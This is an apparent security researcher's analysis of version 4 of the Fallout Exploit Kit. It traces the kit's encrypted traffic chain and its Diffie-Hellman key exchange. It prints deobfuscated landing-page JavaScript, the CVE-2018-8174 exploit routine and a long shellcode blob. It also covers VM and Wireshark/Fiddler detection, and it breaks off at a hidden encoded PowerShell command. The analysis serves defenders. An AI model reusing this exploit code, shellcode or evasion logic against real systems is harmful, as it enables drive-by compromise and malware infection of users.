First We have been observing the Fallout Exploit Kit since August 2018. Fallout is using non-characteristic URL and heavily obfuscated landing page. The user still exists and attacks are observed daily. Recently, we were investigating an attack campaign that infects Raccoon Stealer in the flow of PopAds-> KeitaroTDS-> Fallout. About Fallout, we have already written three reports. The first one was about the emergence of Fallout, the second one was to start using PowerShell and the third one was to start exploiting PoC on GitHub. We divide these major changes by version and call them v1~3. Hello “Fallout Exploit Kit” In-Depth analysis of new Fallout Exploit Kit Analysis of Fallout Exploit Kit v3 We wrote about v3 in March 2019. v3 is not stable and has been updated to the next version immediately. @EKFiddle (created and maintained by @jeromesegura) reported this change on April 11. #EKFiddle [Regex update]: #FalloutEKSeems like there is no more use of the PoC on GitHub for CVE-2018-8174.Pushing #GandCrab in this particular instance.https://t.co/U67qZosp1e pic.twitter.com/buVTakYuhJ— EKFiddle (@EKFiddle) 2019年4月11日 We call this a big update v4 (it is still v4). Detailed analysis report has not been written about what kind of update Fallout has done. However, this update is very big. At least for us (Exploit Kit analyst), that made the analysis very cumbersome. Fallout v4 incorporates the following features. 1. Diffie-Hellman key exchange 2. VM detection 3. Process detection Here, we will share detailed analysis results on the updates made by Fallout v4. But unfortunately, we did not understand everything. If you are aware of it, please help us. Traffic chain First, let’s look at the previous traffic chain. v1~3 was like this. In v3, it acquired PoC of CVE-2018-8174 from GitHub, and attacked by rewriting the part of shellcode. So what kind of traffic chain is v4? 1. Landing Page 2. JavaScript Code 3. Encoded Code 1 4. Encoded Code 2 (CVE-2018-8174 + SWF Loader) 5. CVE-2018-15982 6. PowerShell Code 7. Malware In this way, an attack is performed by seven traffics. Let’s look at each one in order. (In the following, we will use different traffic data from the above. The detailed reason will be mentioned later, but it is difficult to capture and analyze traffic at the same time) Landing Page + JS Code + Encoded Data In the landing page, JavaScript code is read first. <!DOCTYPE html> <html> <head> <meta http-equiv="x-ua-compatible" content="IE=10"> <script type="text/javascript" src="/04_09_2003/Symposium?Peristele=02_03_1943&LE3r=Aps&ILZhH=Frazzling-Anorexias"></script> </head> This includes CryptoJS and BigInteger obfuscated. Excluding the large library parts, there is very little processing. // key window.III1l1 = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("8b69cbdfc5fe43e69b7920c8ee721fc9"); // iv window.II1ll11I = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("301ae8205ddcd5897df69e3b0c056c34"); // aes_decrypt(enc_data, key, iv) window.l11llIll = window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"]("p4N9IqH/oiAKHkDCR0zXXfrvhwVrVPsFZSNUjkVFXxxBofjpd5JLM1sdAega3oRy", III1l1, { lI1lIl1Ill: II1ll11I })["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]); First, two data (8b69cbdfc5fe43e69b7920c8ee721fc9 and 301ae8205ddcd5897df69e3b0c056c34) will appear. This is a key and an IV for AES encryption. By decrypting the next Base64 character string using these keys and IV, the necessary data (specifically, the URL for acquiring encoded data used in the next step) can be obtained. . When it tries decoding, it becomes like this. Next is the process of checking which browser is being used. Depending on it, Opera, Firefox, IE or Chrome is investigated. // check browser window["String"]["prototype"]["II1l1IlI"] = function () { return (!!window["opr"] && !!window["opr"]["addons"] || !!window["opera"] || navigator["userAgent"]["indexOf"](" OPR/") >= 0) + this + (typeof window["InstallTrigger"] !== "undefined") + this + (false || !!window["document"]["documentMode"]) + this + (!!window["chrome"] && !!window["chrome"]["runtime"]) }; Then there is a process to check the version of Adobe Flash Player. This data will be used later. (function () { window.l1l111I = ''; try { window.l1l111I = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').getVariable('$version') } catch (e) {} })(); The process then returns to the landing page. In the landing page, one function is defined and executed. Let’s look at that function. // str_A var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](); // str_B var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_C var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_D var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_E => str_B.modPow(str_C, str_D) var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll, lll1II); Here, many processes such as window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']() appear. This is defined in CryptoJS and generates a 32 character random hexadecimal string. After generating four random data, use the second, third and fourth of them to generate the fifth data. Here modPow is used. The five data prepared here will be used in the ensuing cryptographic process. We call them str_A, str_B, str_C, str_D, str_E. The following code is divided into three parts. Onreadystatechange after the first one has sent a request to the server. The process of generating data to be sent by the second. The third is the process to send. These are the standard XMLHttpRequest POST procedures. First, let’s look at the process of generating transmission data. var l11IlIIlllll = {}; l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A // browser check data l11IlIIlllll['II1l1IlI'] = '@@' ['II1l1IlI'](); Five data have been added to the array l11IlIIlllll. Other than the last one is the random data created earlier. There are 5 random data, but the data other than str_C is send data. The last one is the browser check data generated earlier. It checks whether the browser is Opera, Firefox, IE or Chrome, respectively, and contains true or false and is concatenated with @@. Such data is prepared for send. It should be noted here that str_C has not been sent to the server. Next, let’s look at the sending process. window['I1l1I1'](Il1I11l, "post", l11llIll, true); /* -- snip -- */ // Send POST window['l1lllIIlI']( Il1I11l, // aes_encrypt(data, key, iv) window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill']( window['IIII1Il'](l11IlIIlllll), // post request data window['III1l1'], // key { lI1lIl1Ill: window['II1ll11I'] } // iv )['lIlIlll11l']() ); This is also a general request sending process. The URL is a string decoded by AES earlier. The data to be sent is the previously prepared data, but these are encrypted by AES. The key and IV are the same as those used to decode the URL. The previous data to be encrypted looks like this. { "lIlII11":"c81e728d9d4c2f636f067f89cc14862c", "lll1II":"a87ff679a2f3e71d9181a67b7542122c", "l11IlIl":"3f05415ebff145466040f6a73dca8704", "lI1lIl1Ill":"c4ca4238a0b923820dcc509a6f75849b", "II1l1IlI":"false@@false@@true@@false" } The data actually sent is encrypted in this way. TvU4TAyld3MNlDcMtLwxBo+uVXAbIB1jpPO1a9HDv2dZs7HonG67s8heWoMyvnUFqFBdoEhU0STYjHHQxX6DK7x7Z1naG/2TAdm+AR5l6gpYVl4jXB9oOOyfJtZrfJHabQT5Jhlqv1dtvsJ+0G27qhamqtPT16wCpXn2R2WHf8NJu9SvXSSVadW7sT6QDt32Jt0z3oR0VIlpuE/w3snfKDNIjJYhuMz/VGYIL9WNdg0hC26sxB5fJ5fOOuifh2rNk9GgNsNdfVP01Tf77GRDu9puTbgfsgYOnCz0ONOmp05B14kJ1tK8ZI6ciOWLvOYV Let’s look at the process after sending. onreadystatechange is called. Here, two AES decodings are performed. Let’s first look at the first decoding process. // aes_decrypt(enc_data, key, iv) var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( Il1I11l['responseText'], // enc_data window['III1l1'], // key { lI1lIl1Ill: window['II1ll11I'] } // iv )['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']); var l1I1l1 = window['lIl11'](lIlIl1IIl11); POST response data is encrypted with AES. The keys and IV are the same as before, and the hard-coded values (8b69cbdfc5fe43e69b7920c8ee721fc9 and 301ae8205ddcd5897df69e3b0c056c34) are hard-coded in the JavaScript code. Jsonify is performed because the JSON data can be obtained by decoding. The decoded JSON data looks like this. { "IlI1l":"9b412e5c651d73fd1e271dd63f6901a0", "I1111":"r+sZGwxURs48PDt8pilYLNYjKbVrMHSmlgv0jeEE7qd8KN+KbbqRpYBUUrEFfM5VSLfRPthHQmyzFoY7fuCtOQQ9vUiMBC+3\/pL…" } Decode the second data using the first (32-character hexadecimal string) of this data. The first data is called str_F. Also, decoding is done with AES, but the key and IV are different from before. var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'], 16); // str_F // key (str_G) => str_F.modPow(str_C, str_D) var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll, lll1II); var I1Il1I1 = llIIlI['lIlIlll11l'](16); var IIIIlI1IllII = 32 - I1Il1I1.length; while (IIIIlI1IllII > 0) { I1Il1I1 = '0' + I1Il1I1; IIIIlI1IllII--; } var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1); var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1); // aes_decrypt(enc_data, key, iv) var Il11lII1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['lIlIl1IIl11'], // enc_data II1ll, // str_G { lI1lIl1Ill: lI1lIl1Ill } // iv => str_A ); The values generated by str_F, str_C and str_D are called str_G. Thus, str_C is required to decode the data, but str_C has not been sent to the server. By looking at the traffic data, you can see str_E and str_G created by str_C, but it is impossible to find str_C. Please see Wikipedia for details. Diffie–Hellman key exchange - Wikipedia The data thus decoded is executed as JavsScript. // eval II1Il['ll1I1'](); Let’s look at the executed code. First, the URL used next is decoded. The key and IV used at this time are hard-coded initial values. // aes_decrypt(enc_url, key, iv) var l11l1I1 =window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"]( "l9kie2x7t4Iq4hRNA3G3Juz+buSrv9OSyATsAvZRjsoWkjatAa3Am6oRnar5jjv2N8XFpvDYQbKswFbyKiGPXM/eRwj5+hz4hg+dTKr5BLk=", III1l1, { lI1lIl1Ill:II1ll11I } )["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]); Then, as before, the function is called. Let’s look at the function. First, define the necessary data for encryption/decryption as before. Give each one a name as before. // str_A2 var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](); // str_B2 var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_C2 var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_D2 var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_E2 => str_B2.powMod(str_C2, str_D2) var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll,lll1II); Next, prepare the data to send as a POST request. Unlike before, Adobe Flash Player version information is also sent. var l11IlIIlllll = {}; l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B2 l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D2 l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E2 l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A2 l11IlIIlllll['II1l1IlI'] = '@@'['II1l1IlI'](); // browser check data l11IlIIlllll['l1l111I'] = window['l1l111I']; // Adobe Flash Player version check data The sending process is the same as the previous one. The key and IV used in this case are also initial values. window['I1l1I1'](Il1I11l,"post",l11l1I1,true); window['l1lllIIlI']( Il1I11l, // aes_encrypt window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill']( window['IIII1Il'](l11IlIIlllll), // POST Data window['III1l1'], // key {lI1lIl1Ill:window['II1ll11I']} // iv )['lIlIlll11l']() ); Thus, onreadystatechange is called as well. Here too, the decoding process is performed as before. First, decode POST response data with the same key and IV as before. // aes_decrypt(enc_data, key, iv) var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( Il1I11l['responseText'], // enc_data window['III1l1'], // key {lI1lIl1Ill:window['II1ll11I']} // iv )['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']); When jsonify the decoded result, three data are included like this. The first 32-character hexadecimal string is called str_F2. { "lIlll1IIlI": "87e087b48d4b06215f486021f23f5470", "lIIIIllIl1": "oUeRtTwLk9lLYqMwZC3AM49H8HDw15IqymZ0W\/vw87Vd9RtdXhps9ZppZc\/INO01Bqk79BOMS9ykHCDPE\/\/kWCHQuuh0\/rr…", "II11lIl11": "88HY4nkc9TWmnRPi\/hEPmk8ZCTJ5tIwItosOTmqFjUBFxCXfoXdMKas+TeKLUbdwsXAhvGa35wNmMnajdPzt1huWerzwnhoGcFP…" } Decrypt these data. Thus two data are decoded. var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'],16); // str_G2 => str_F2.modPow(str_C2, str_D2) var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll,lll1II); var I1Il1I1 = llIIlI['lIlIlll11l'](16); var IIIIlI1IllII = 32 - I1Il1I1.length; while(IIIIlI1IllII > 0) { I1Il1I1 = '0'+I1Il1I1; IIIIlI1IllII--; } var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1); // str_G2 var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1); // str_A2 // aes_decrypt() var I1II111I1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['lIIIIllIl1'], // enc_data_1 II1ll, // str_G2 {lI1lIl1Ill: lI1lIl1Ill} // str_A2 ); var IIIIl = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['II11lIl11'], // enc_data_2 II1ll, // str_G2 {lI1lIl1Ill: lI1lIl1Ill} // str_A2 ); The data thus decoded is written to Body and executed. The decoded data is the CVE-2018-8174 exploit code and the CVE-2018-15982 exploit code for reading swf loader. if(IlIII1lll['length'] !== 0) { var IIlIl = window['document']['createElement']("iframe"); IIlIl['setAttribute']("id", "IlIlll1I1"); window['document']['getElementsByTagName']("BODY")[0].appendChild(IIlIl); var I11I11IIlIII = window['document']['getElementById']("IlIlll1I1")['contentWindow']['document']; I11I11IIlIII['open'](); I11I11IIlIII['write'](IlIII1lll); I11I11IIlIII['close'](); } if(lIl1l1I['length'] !== 0) { var l1III11 = window['document']['createElement']("iframe"); l1III11['setAttribute']("id", "lII1I1IlI1I"); window['document']['getElementsByTagName']("BODY")[0].appendChild(l1III11); var llIll1lI = window['document']['getElementById']("lII1I1IlI1I")['contentWindow']['document']; llIll1lI['open'](); llIll1lI['write'](lIl1l1I); llIll1lI['close'](); } For swf loader, the following code is executed. <html> <head> <meta http-equiv="x-ua-compatible" content="IE=10"> </head> <body> <div id="BnjJbx"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="205" height="528" id="BnjJbx" align="middle"> <param name="movie" value="/24_02_1964/05_04_1933/3410-Skegger-12666" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="play" value="true" /> <param name="loop" value="true" /> <param name="wmode" value="window" /> <param name="scale" value="showall" /> <param name="menu" value="false" /> <param name="devicefont" value="false" /> <param name="salign" value="" /> <param name="allowScriptAccess" value="sameDomain" /></object></div> </body> </html> Thus, the swf file that exploits CVE-2018-15982 is read and executed. CVE-2018-8174 The exploit code used is very similar to PoC. Sub StartExploit UAF InitObjects vb_adrr=LeakVBAddr() vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr)) msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll") krb_base=GetBaseFromImport(msv_base,"kernelbase.dll") ntd_base=GetBaseFromImport(msv_base,"ntdll.dll") VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect") NtContinueAddr=GetProcAddr(ntd_base,"NtContinue") SetMemValue GetShellcode() ShellcodeAddr=GetMemValue()+8 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr) lIlll=GetMemValue()+69596 SetMemValue ExpandWithVirtualProtect(lIlll) llIIll=GetMemValue() ExecuteShellcode End Sub StartExploit The process to generate shellcode is like this. Function GetShellcode() IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%u8B55%u83EC%uF8E4%uEC81%u00CC%u0000%u5653%uE857%u08B0%u0000%uF08B%u44C7%u1824%u05CD%u5379%u848D%uB024%u0000%u8900%u2474%u8934%u2444%u8D14%u2454%u8D10%u2444%uC744%u2444%u1D1C%u2BDE%u8982%u2444%u8D10%u244C%u8D14%u2484%u0094%u0000%u4489%u2824%u448D%u1824%u8D50%u2444%u502C%u1EE8%u0006%u8B00%u245C%u8D18%u244C%u8B18%u247C%u8B1C%u8903%u2444%u8B40%u1C47%u4489%u4424%u478B%u8920%u2444%u3348%u89C0%u2444%u8918%u2444%u891C%u2444%uE834%u02E9%u0000%u548D%u1C24%uCF8B%u66E8%u0002%u8300%u2464%u0038%u4C8D%u2024%u406A%uE856%u02FE%u0000%uC683%u8D40%u244C%u6828%u0080%u0000%uE856%u02EC%u0000%u74FF%u2C24%u4C8B%u5024%u448D%u4824%u74FF%u2C24%uD68B%u74FF%u4824%u5753%u8D50%u2444%u5060%u448D%u4C24%uE850%u0389%u0000%uDB33%uC483%u3938%u245C%u742C%u8B41%u2474%u8D38%u2444%u6A48%u5F44%u5357%uFF50%u83D6%u0CC4%u7C89%u4824%u448D%u1824%u106A%u5053%uD6FF%uC483%u8D0C%u2444%u5018%u448D%u4C24%u5350%u6853%u0000%u0800%u5353%uFF53%u2474%u5350%u54FF%u6424%uFF53%u2454%u5F44%u5B5E%uE58B%uC35D%u8B55%u83EC%u0CEC%u458B%u890C%uF445%u458B%u8908%uF845%u6583%u00FC%u07EB%u458B%u40FC%u4589%u8BFC%uFC45%u453B%u7310%u8B12%uF845%u4503%u8BFC%uF44D%u4D03%u8AFC%u8809%uEB08%uC9DF%u55C3%uEC8B%u458B%u0F08%u00BE%uC085%u2D74%u458B%u0F08%u00BE%uF883%u7C41%u8B19%u0845%uBE0F%u8300%u5AF8%u0E7F%u458B%u0F08%u00BE%uC083%u8B20%u084D%u0188%u458B%u4008%u4589%uEB08%u5DC9%u55C3%uEC8B%u8B51%u0845%u4589%uEBFC%u8B07%uFC45%u8940%uFC45%u458B%u0FFC%u00BE%uC085%u0274%uEDEB%u458B%u2BFC%u0845%uC3C9%u5653%u8B57%u33D9%u53FF%u3347%uE8F6%uFFC9%uFFFF%u8B59%u85C8%u74C9%u0F24%u03B6%uD233%uC703%uF1BF%u00FF%uF700%u43F7%uFA8B%uD233%u048D%uBE3E%uFFF1%u0000%uF6F7%uF28B%uE983%u7501%uC1DC%u10E6%u048D%u5F37%u5B5E%u55C3%uEC8B%uEC83%u5310%u5756%uF98B%u5589%u33FC%u8BF6%u3C47%u5C8B%u7838%uDF03%u438B%u8B1C%u204B%uC703%u4589%u03F0%u8BCF%u2443%uC703%u4D89%u89F8%uF445%u7339%u7618%u8B18%uB10C%uCF03%u7BE8%uFFFF%u3BFF%uFC45%u1074%u4D8B%u46F8%u733B%u7218%u33E8%u5FC0%u5B5E%uC3C9%u458B%u8BF4%uF04D%uB70F%u7004%u048B%u0381%uEBC7%u64EA%u30A1%u0000%u8B00%u0C40%u408B%u8B14%u8B00%u8B00%u1040%u64C3%u30A1%u0000%u8B00%u0C40%u408B%u8B14%u8B00%u1040%u56C3%u8B57%u8BF9%u56F2%u078B%uD0FF%uC085%u0675%u478B%u5604%uD0FF%u5E5F%u56C3%uF18B%uE856%uFEAB%uFFFF%u8B59%uE8CE%uFF06%uFFFF%u3D5E%u06DE%u3F54%u1F74%u413D%uCD05%u7425%u3D18%u0309%u0F05%u1174%uEC3D%u1803%u7416%u3D0A%u044B%u19F3%u0374%uC033%u33C3%u40C0%u55C3%uEC8B%uEC81%u013C%u0000%u418B%u5308%u5756%uFA8B%uDB33%u518B%u890C%uF855%u518B%u8B10%u1449%u6A53%u8902%uFC55%u4D89%uFFF4%u8BD0%u83F0%uFFFE%u4074%u858D%uFEC8%uFFFF%u85C7%uFEC8%uFFFF%u0128%u0000%u5650%u55FF%u85F8%u74C0%u8D27%uEC8D%uFFFE%uE8FF%uFF6F%uFFFF%uC085%u1575%u858D%uFEC8%uFFFF%u5650%u55FF%u85FC%u75C0%u56E2%u55FF%uEBF4%u3303%u43DB%u1F89%u5E5F%uC95B%u55C3%uEC8B%uEC83%u5310%u5756%uC033%uF98B%u3340%u53C9%uA20F%uF38B%u8D5B%uF05D%u0389%u7389%u8904%u084B%u5389%u8B0C%uF845%uE8C1%u891F%u5F07%u5B5E%uC3C9%u8B55%u81EC%u04EC%u0001%u5300%u3356%u57F6%uC68B%u8488%uFC05%uFFFE%u40FF%u003D%u0001%u7200%u8BF1%u8BDE%u8BFE%u8AF1%u3D94%uFEFC%uFFFF%uC78B%uE083%u0F07%uCAB6%uB60F%u3004%uC303%uC803%uB60F%u8AD9%u1D84%uFEFC%uFFFF%u8488%uFC3D%uFFFE%u47FF%u9488%uFC1D%uFFFE%u81FF%u00FF%u0001%u7200%u8BC8%u0C7D%uF633%uDE8B%uFF85%u5574%u458B%u8908%u0C45%u438D%u0F01%uD8B6%u948A%uFC1D%uFFFE%u0FFF%uC2B6%uC603%uB60F%u8AF0%u3584%uFEFC%uFFFF%u8488%uFC1D%uFFFE%u88FF%u3594%uFEFC%uFFFF%uB60F%u1D8C%uFEFC%uFFFF%uB60F%u03C2%u8BC8%u0C45%uB60F%u8AC9%u0D8C%uFEFC%uFFFF%u0830%u8940%u0C45%uEF83%u7501%u8BB1%u0845%u5E5F%uC95B%u55C3%uEC8B%uEC83%u8B48%u1C45%u4D89%u53F4%u8B56%u8B08%u0870%u4D89%u8BF8%u0448%u4D89%u8BF0%u0C48%u4D89%u8BE8%u1048%u4D89%u8BE0%u1448%u4D89%u8BD8%u1848%u458B%u5714%u046A%u5589%u8BEC%u1850%u4D89%u8BC8%u2448%u458B%u6818%u1000%u0000%u046A%u006A%u388B%u5589%u89D4%uFC4D%u7D89%uFFD0%u6AD2%u8B04%u6AD8%u5300%u5D89%uFFE4%u83D7%u207D%u8D00%u1445%u046A%u5350%u1875%u7D83%u0024%u0975%u45C7%uC614%u90EA%uEB2A%uC71D%u1445%uF9D7%u2A90%u14EB%u7D83%u0024%u45C7%uD214%u90EB%u752A%uC707%u1445%uE4D2%u2A90%u29E8%uFFFC%u8BFF%u084D%u458D%u83C0%u0CC4%u45C7%uF4C0%uDBBC%uC770%uC445%uE14D%u1989%u086A%uE850%uFE76%uFFFF%u5959%uDB33%u458D%u53C0%u5353%u5053%u55FF%u8BF8%u85F8%u75FF%u8B0A%u1045%u1889%u23E9%u0001%u5300%u6A53%u5303%u6853%u01BB%u0000%u75FF%u57F4%u55FF%u8BF0%u89D8%u145D%uDB85%u840F%u00FB%u0000%u4D8B%u8D08%uB845%u086A%uC750%uB845%uC6E5%u1DB0%u45C7%u7CBC%uB9D1%uE819%uFE1C%uFFFF%u5959%uC033%u6850%u3000%u8080%u5050%uFF50%uEC75%u458D%u50B8%uFF53%uE855%uD88B%uDB85%u840F%u00B8%u0000%u046A%u75FF%u6AE4%u6A00%u5300%u55FF%u85E0%u0FC0%uA084%u0000%u8300%u1C65%u8D00%uDC45%u6583%u00DC%u8D50%u1845%u45C7%u0418%u0000%u5000%u458D%u501C%u0568%u0000%u5320%u55FF%u83D8%u187D%u7400%u8376%u1C7D%u7400%u6A70%u6804%u1000%u0000%u75FF%u6A1C%uFF00%uD455%u75FF%u8B1C%u0C4D%u006A%u8950%uFF01%uD055%u6583%u00CC%u458D%u50CC%u458B%uFF0C%u1C75%u30FF%uFF53%uC855%uFF53%uFFD6%u1475%uD6FF%uFF57%u83D6%u207D%u8B00%uFC75%u0474%u006A%uD6FF%u7D83%u0024%u0474%u006A%uD6FF%u458B%uFF0C%u1C75%u4D8B%uFF08%uE830%uFD52%uFFFF%u458B%u5910%uC759%u0100%u0000%uEB00%u5311%uD6FF%u75FF%uFF14%u57D6%uD6FF%u458B%u8310%u0020%u5E5F%uC95B%u55C3%uEC8B%uEC83%u5310%u8B56%u8BF1%u57DA%u7589%uE8FC%uFBF7%uFFFF%uF88B%u43BA%u1C04%u8B19%uE8CF%uFB83%uFFFF%u368B%u75BA%uB905%u8B28%u89CF%u1446%u72E8%uFFFB%u8BFF%uFC75%u51BA%u3209%u8B73%u890E%u1C41%uCF8B%u5EE8%uFFFB%u8BFF%uBA0E%u0614%u33F5%u4189%u8B08%uE8CF%uFB4D%uFFFF%u0E8B%u97BA%u8104%u891D%u8B01%uE8CF%uFB3D%uFFFF%u0E8B%u4DBA%u8505%u8927%u0441%uCF8B%u2CE8%uFFFB%u8BFF%uBA0E%u04E4%u2259%u4189%u8B0C%uE8CF%uFB1B%uFFFF%u0E8B%uD3BA%u7004%u891F%u1041%uCF8B%u0AE8%uFFFB%u8BFF%uBA0E%u047A%u1A1E%u4189%u8B18%uE8CF%uFAF9%uFFFF%u0E8B%uF3BA%u8503%u8915%u2041%uCF8B%uE8E8%uFFFA%u8BFF%u890E%u2441%u58E8%uFFFB%uBAFF%u028C%u08D8%uC88B%uD2E8%uFFFA%u8BFF%u6A0B%u890C%u8D01%uF045%u4D8B%u500C%u45C7%uC2F0%u8DE0%uC720%uF445%uB412%u37CD%u45C7%uEFF8%uF16B%uE8A4%uFC34%uFFFF%u5959%u0E8B%u558D%uE8F0%uFB2B%uFFFF%uF88B%u5DBA%u1006%u8B36%uE8CF%uFA91%uFFFF%u758B%uBA08%u0584%u29FB%u0E8B%u4189%u8B0C%uE8CF%uFA7D%uFFFF%u0E8B%u55BA%uC706%u8935%u1441%uCF8B%u6CE8%uFFFA%u8BFF%uBA0E%u078C%u4B92%u4189%u8B10%uE8CF%uFA5B%uFFFF%u0E8B%u55BA%u6406%u8936%u0841%uCF8B%u4AE8%uFFFA%u8BFF%uBA0E%u051D%u245C%u4189%u8B04%uE8CF%uFA39%uFFFF%u0E8B%u46BA%uC006%u8935%u8B01%uE8CF%uFA29%uFFFF%u0E8B%u5E5F%u895B%u1841%uC3C9%uECD7%u2182%uA319%u2DD6%u29FE%uCBFE%u5CE9%uB27D%u501A%uCF26%u6A47%u54FE%uDABA%u8A85%uEF83%u3361%u09D1%u20F7%u16EC%uD9B7%u917A%uDE1A%u2281%uEA7F%u3143%u6ACE%u1A52%u4FF4%u500B%uC276%u5A57%uC1F8%uE09A%u258F%uA209%u6BCD%u28EE%uE3E7%u2FD5%u8D28%u3568%uAE4A%u0623%u309B%u8E87%uE4E0%u8EF7%u5F02%u7AB4%u73DA%u7483%uB0D2%uBC0E%uB049%u40EE%u8610%u7665%u07AF%u7330%u3C80%u6436%uF745%u5A61%uC1F8%uBBE2%u5581%uF71D%u00A7%u7F8D%u4907%u11AF%uB565%uF4E6%u755E%u19EE%u23AF%u8DB6%uEB89%u2838%u11BF%uC109%u1219%uD17E%uBEEA%uDD49%uF759%u09D6%uEA08%u8E45%uB602%u1B93%u19C4%u9146%uB94D%u9E6C%u0BC7%u00E8%u0000%u5800%uE883%u2D05%u00C0%u0000%u00C3" &lIIII(IIIII(""))) IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141")) GetShellcode=IIlI End Function Let’s read shellcode. Shellcode The decoding algorithm in the shellcode has not changed from v3 and remains RC4. Analysis of Fallout Exploit Kit v3 The hash algorithm of API hash has not changed either. API hashed by the dualaccModFFF1Hash algorithm. unsigned int __thiscall dualaccModFFF1Hash(unsigned __int8 *this) { unsigned __int8 *v1; // ebx int v2; // edi unsigned int v3; // esi int i; // ecx unsigned int v5; // edx v1 = this; v2 = 1; v3 = 0; for ( i = zz_count(this); i; --i ) { v5 = (v2 + (unsigned int)*v1++) % 0xFFF1; v2 = v5; v3 = (v3 + v5) % 0xFFF1; } return v2 + (v3 << 16); } However, there were interesting changes. Analysis environment detection codes has been added in shellcode. VM Detection Query hypervisor precense using CPUID. unsigned int __thiscall zz_vm_detect(unsigned int *this) { unsigned int *v1; // edi unsigned int result; // eax v1 = this; _EAX = 1; __asm { cpuid } result = _ECX >> 31; *v1 = _ECX >> 31; return result; } Process Detection Get a list of running processes. Convert process name to lower case. int __cdecl zz_tolowercase(_BYTE *a1) { int result; // eax while ( 1 ) { result = (char)*a1; if ( !*a1 ) break; if ( (char)*a1 >= 65 && (char)*a1 <= 90 ) *a1 += 32; ++a1; } return result; } Compare to the following hashes. Once again, It uses the dualaccModFFF1Hash algorithm. 0x3F5406DE 0x25CD0541 0x0F050309 0x161803EC 0x19F3044B Two process names were identified. I do not know the others. >>> hex(dualaccModFFF1Hash("wireshark.exe")) '0x25cd0541' >>> hex(dualaccModFFF1Hash("fiddler.exe")) '0x19f3044b' Like v3, shellcode downloads, decodes and executes encrypted PowerShell code. PowerShell The PowerShell code to be executed is like this. powershell.exe -w hidden -noni -enc 